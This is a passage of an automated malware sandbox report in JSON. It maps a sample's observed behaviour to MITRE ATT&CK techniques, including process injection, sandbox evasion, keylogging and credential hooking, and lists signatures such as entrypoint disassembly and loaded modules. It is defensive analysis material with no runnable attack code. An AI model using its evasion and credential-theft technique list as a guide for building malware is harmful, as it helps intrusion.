"https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Code Signing", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002", "informative_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 4, "informative_identifiers_count": 17}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 4, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Exfiltration Over C2 Channel", "attck_id": "T1041", "attck_id_wiki": "https://attack.mitre.org/techniques/T1041", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\45E25AE0\"\n \"45E25AE0\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "certificate-0", "type": 17, "relevance": 10, "name": "The input sample is signed with a certificate", "description": "The input sample is signed with a certificate issued by \"CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US\" (SHA1: 5A:25:7D:33:37:18:C4:B4:68:A5:DB:C6:64:33:48:AF:66:7A:EE:3D; see report for more information)\n The input sample is signed with a certificate issued by \"CN=Microsoft Root Certificate Authority 2010, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US\" (SHA1: 8B:FE:31:07:71:2B:3C:88:6B:1C:96:AA:EC:89:98:49:14:DC:9B:6B; see report for more information)", "origin": "Certificate Data", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"upNext.tmp\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67A482A2.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,push\tebx,push\tesi,mov\teax, 0x11991c,call\t0x46fd8,mov\tebx, 0x11f0dc,mov\tesi, dword ptr [0x11cbec],xor\teax, eax,push\tebp,push\t0x119d3d,push\tdword ptr fs:[eax],mov\tdword ptr fs:[eax], esp,mov\tdl, 1,mov\teax, dword ptr [0x118c70],call\t0x43d24,mov\tdword ptr [0x11f0f8], eax,call\t0x119078,call\t0x11920c,call\t0x118ddc,call\t0x1198d0,call\t0x118de4,mov\teax, dword ptr [0x11ca3c],mov\teax, dword ptr [eax],xor\tedx, edx,call\t0xb3168,\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,push\tebx,push\tesi,mov\teax, 0x11991c,call\t0x46fd8,mov\tebx, 0x11f0dc,mov\tesi, dword ptr [0x11cbec],xor\teax, eax,push\tebp,push\t0x119d3d,push\tdword ptr fs:[eax],mov\tdword ptr fs:[eax], esp,mov\tdl, 1,mov\teax, dword ptr [0x118c70],call\t0x43d24,mov\tdword ptr [0x11f0f8], eax,call\t0x119078,call\t0x11920c,call\t0x118ddc,call\t0x1198d0,call\t0x118de4,mov\teax, dword ptr [0x11ca3c],mov\teax, dword ptr [eax],xor\tedx, edx,call\t0xb3168,\"\n \"upNext.tmp\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,push\tebx,push\tesi,mov\teax, 0x11991c,call\t0x46fd8,mov\tebx, 0x11f0dc,mov\tesi, dword ptr [0x11cbec],xor\teax, eax,push\tebp,push\t0x119d3d,push\tdword ptr fs:[eax],mov\tdword ptr fs:[eax], esp,mov\tdl, 1,mov\teax, dword ptr [0x118c70],call\t0x43d24,mov\tdword ptr [0x11f0f8], eax,call\t0x119078,call\t0x11920c,call\t0x118ddc,call\t0x1198d0,call\t0x118de4,mov\teax, dword ptr [0x11ca3c],mov\teax, dword ptr [eax],xor\tedx, edx,call\t0xb3168,\"\n \"DISMHOST.EXE.67A482A2.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70bf0000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"KERNEL32\" at base 775f0000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b3b0000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"KERNEL32.DLL\" at base 775f0000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"USER32.DLL\" at base 772d0000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"ADVAPI32.DLL\" at base 77750000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"VERSION.DLL\" at base 74ba0000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"WSOCK32.DLL\" at base 70700000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75760000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"WININET.DLL\" at base 75aa0000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"SHFOLDER.DLL\" at base 6c400000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"OLE32.DLL\" at base 773a0000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74400000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"DWMAPI.DLL\" at base 74170000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"OLEPRO32.DLL\" at base 6cf70000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 750d0000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74c30000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73d90000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73770000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 771e0000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"RPCRT4.DLL\" at base 77500000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 736f0000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"DNSAPI.DLL\" at base 74f90000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 736e0000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"WS2_32.DLL\" at base 775b0000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"IPHLPAPI.DLL\" at base 73a60000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 739d0000\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"RASADHLP.DLL\" at base 71e50000\n \"upNext.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70bf0000\n \"upNext.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"upNext.exe\" loaded module \"KERNEL32\" at base 775f0000\n \"upNext.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"upNext.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b410000\n \"upNext.exe\" loaded module \"KERNEL32.DLL\" at base 775f0000\n \"upNext.exe\" loaded module \"USER32.DLL\" at base 772d0000\n \"upNext.exe\" loaded module \"ADVAPI32.DLL\" at base 77750000\n \"upNext.exe\" loaded module \"VERSION.DLL\" at base 74ba0000\n \"upNext.exe\" loaded module \"WSOCK32.DLL\" at base 70700000\n \"upNext.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75760000\n \"upNext.exe\" loaded module \"WININET.DLL\" at base 75aa0000\n \"upNext.exe\" loaded module \"SHFOLDER.DLL\" at base 70c20000\n \"upNext.exe\" loaded module \"OLE32.DLL\" at base 773a0000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74400000\n \"upNext.exe\" loaded module \"DWMAPI.DLL\" at base 74170000\n \"upNext.exe\" loaded module \"OLEPRO32.DLL\" at base 6b3f0000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 750d0000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74c30000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73d90000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73770000\n \"upNext.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 771e0000\n \"upNext.exe\" loaded module \"RPCRT4.DLL\" at base 77500000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 736f0000\n \"upNext.exe\" loaded module \"DNSAPI.DLL\" at base 74f90000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 736e0000\n \"upNext.exe\" loaded module \"WS2_32.DLL\" at base 775b0000\n \"upNext.exe\" loaded module \"IPHLPAPI.DLL\" at base 73a60000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 739d0000\n \"upNext.exe\" loaded module \"RASADHLP.DLL\" at base 71e50000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004224)\n 